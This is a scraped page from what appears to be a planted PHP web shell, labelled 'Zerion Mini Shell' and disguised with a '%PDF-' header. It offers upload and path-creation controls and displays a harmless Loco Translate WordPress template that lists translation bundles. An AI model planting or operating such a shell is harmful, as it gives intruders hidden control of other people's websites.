%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/vacivi36/public_bakcup/old/wp-content/plugins/loco-translate/tpl/admin/list/
Upload File :
Create Path :
Current File : /home/vacivi36/public_bakcup/old/wp-content/plugins/loco-translate/tpl/admin/list/inc-table.php

<?php
/**
 * List of bundles
 */
?> 

    <table class="wp-list-table widefat fixed striped">
        <thead>
            <th data-sort-type="s">
                <?php esc_html_e('Bundle name', 'loco')?> 
            </th>
            <th data-sort-type="s">
                <?php esc_html_e('Text domain','loco')?> 
            </th>
            <th data-sort-type="n">
                <?php esc_html_e('Last updated','loco')?> 
            </th>
            <th data-sort-type="n">
                <?php esc_html_e('Sets','loco')?> 
            </th>
        </thead>
        <tbody><?php
            /* @var $bundle Loco_pages_ViewParams */ 
            foreach( $bundles as $bundle ):?> 
            <tr id="loco-<?php $bundle->e('id')?>">
                <td data-sort-value="<?php $bundle->e('name')?>">
                    <a href="<?php $bundle->e('view')?>"><?php $bundle->e('name')?></a>
                </td>
                <td>
                    <?php $bundle->e('dflt')?> 
                </td>
                <td data-sort-value="<?php $bundle->f('time','%u')?>">
                    <?php $bundle->time ? $bundle->date('time') : print '--'?> 
                </td>
                <td data-sort-value="<?php $bundle->f('size','%u')?>">
                    <?php $bundle->n('size')?> 
                </td>
            </tr><?php
            endforeach;?> 
        </tbody>
    </table>

Zerion Mini Shell 1.0